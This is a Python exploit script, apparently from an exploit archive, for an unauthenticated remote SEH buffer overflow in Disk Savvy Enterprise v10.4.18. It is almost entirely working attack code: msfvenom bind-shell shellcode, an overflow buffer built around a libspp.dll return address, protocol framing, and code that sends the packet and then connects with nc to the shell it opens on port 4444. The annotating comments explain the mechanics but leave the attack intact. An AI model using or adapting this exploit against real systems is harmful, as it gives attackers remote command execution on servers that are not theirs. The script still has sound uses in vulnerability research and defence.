Disk Savvy Enterprise v10.4.18 Unauthenticated Remote Buffer Overflow
# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
# Date: 29/01/2018
# Exploit Author: Daniel Teixeira
# Vendor Homepage: http://www.disksavvy.com/
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe
# Version: 10.4.18
# Tested on: Windows 7 x86
import socket
import subprocess
from os import system
from struct import pack
from sys import exit
from time import sleep
# Target endpoint. Loopback matches the local test install noted in the header
# above; change `host` to aim at a remote server. `host` is reused later as the
# address the bind-shell client connects to, so keep it a plain IP/hostname.
host, port = "127.0.0.1", 9124
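# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode
#
# Payload choice: windows/shell_bind_tcp. Once it runs, the TARGET listens on
# TCP 4444 and hands cmd.exe to whoever connects first -- there is no
# authentication, so on anything other than an isolated lab host this leaves an
# open door for third parties. A reverse payload (or firewalling 4444 to the
# operator's address) is the safer choice for a real engagement.
#
# The encoder was given the bad-character list above; the blob below avoids
# those bytes (the framing header built later does contain \x00, so the
# constraint evidently applies to the payload body only). The opening bytes
# (\xd9\x74\x24\xf4 ... \x5d) look like the usual fnstenv/pop GetPC stub of an
# msfvenom encoder -- NOTE(review): verify the exact encoder in a debugger if it
# matters. The decoder and the shell run from the stack (see `jmp esp` below),
# so the target process must have an executable stack; DEP in OptOut/AlwaysOn
# mode on another host would break this. 355 bytes as generated.
shellcode = ""
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"

# Overflow layout (SEH overwrite), 1000 bytes total:
#   [0:124]    filler that reaches the SEH record
#   [124:128]  nSEH -- "\x90\x09\xeb\x05" reads as nop; or ebx,ebp; then 0x05
#              opens an `add eax, imm32` whose 4-byte immediate is the handler
#              address that follows, so execution walks straight over the SEH
#              field without needing a short jump (verify in a debugger)
#   [128:132]  SEH  -- 0x10056d13 pop ebx / pop ecx / ret 0x20 in libspp.dll
#              (author's mona note: no ASLR, no rebase, no SafeSEH)
#   [132:142]  NOP pad
#   [142:202]  20 x `add esp, 0x64` (esp += 2000) -- presumably walks esp past the
#              exception frames into the NOP sled below
#   [202:204]  `jmp esp`
#   [204:...]  NOP sled, then the shellcode at the very end
payload = "A" * 124  # offset
payload += "\x90\x09\xeb\x05"  # nSEH: falls through over the SEH return value (see above)
payload += "\x13\x6d\x05\x10"  # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll)
payload += "\x90" * 10
payload += "\x83\xc4\x64" * 20  # metasm > add esp,100
payload += "\xff\xe4"  # metasm > jmp esp

# The original silently multiplied by a negative count here, which turns the
# sled into "" and changes the packet length without warning when a larger
# shellcode is dropped in. Fail loudly instead -- the framing below carries
# len(payload), so a mis-sized payload is not a useful failure mode.
sled_len = 1000 - len(payload) - len(shellcode)
if sled_len < 0:
    raise ValueError(
        "shellcode too large: payload exceeds the 1000-byte budget by %d bytes" % -sled_len
    )
payload += "\x90" * sled_len
payload += shellcode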
# Request framing, reproduced as the author found it to work; the meaning of
# the individual fields is not documented here. Decoded little-endian the
# prefix is 0xabba1975, 0x00000003, 0x00004000, then the payload length twice
# and the last payload byte widened to 32 bits. The framing contains \x00
# bytes, so the encoder's bad-character list evidently constrains only the
# payload body, not the header.
total = len(payload)
fields = [
    "\x75\x19\xba\xab",
    "\x03\x00\x00\x00",
    "\x00\x40\x00\x00",
    pack('<I', total),
    pack('<I', total),
    pack('<I', ord(payload[-1])),
]
header = "".join(fields)
packet = header + payload
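# Deliver the packet, then attach to the bind shell the payload opens.
# Python 2 script: the str literals above are byte strings here (see the
# print syntax in the original); under Python 3 the payload would need to be
# bytes end to end.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    try:
        print("[*] Testing connection to target %s:%s" % (host, port))
        s.connect((host, port))
    except socket.error as err:
        # Only connection failures are expected here; the original bare
        # `except:` also swallowed KeyboardInterrupt and SystemExit.
        print("[-] Unable to communicate to target %s:%s (%s)" % (host, port, err))
        exit()
    # sendall() loops until every byte is on the wire; send() may return after
    # a partial write and leave the server with a truncated packet.
    s.sendall(packet)
    print("[*] Payload Sent..")
    # Bind-shell payload: from now on the target accepts a shell connection on
    # 4444 from anyone, not just this operator.
    print("[*] Connecting to bind shell %s:4444 .." % host)
    sleep(5)
    # argv form instead of os.system(): `host` is never re-parsed by a shell,
    # so this stays safe if it is later taken from the command line. The
    # exploit socket is deliberately kept open until nc returns, matching the
    # original timing.
    subprocess.call(["nc", host, "4444"])
finally:
    s.close()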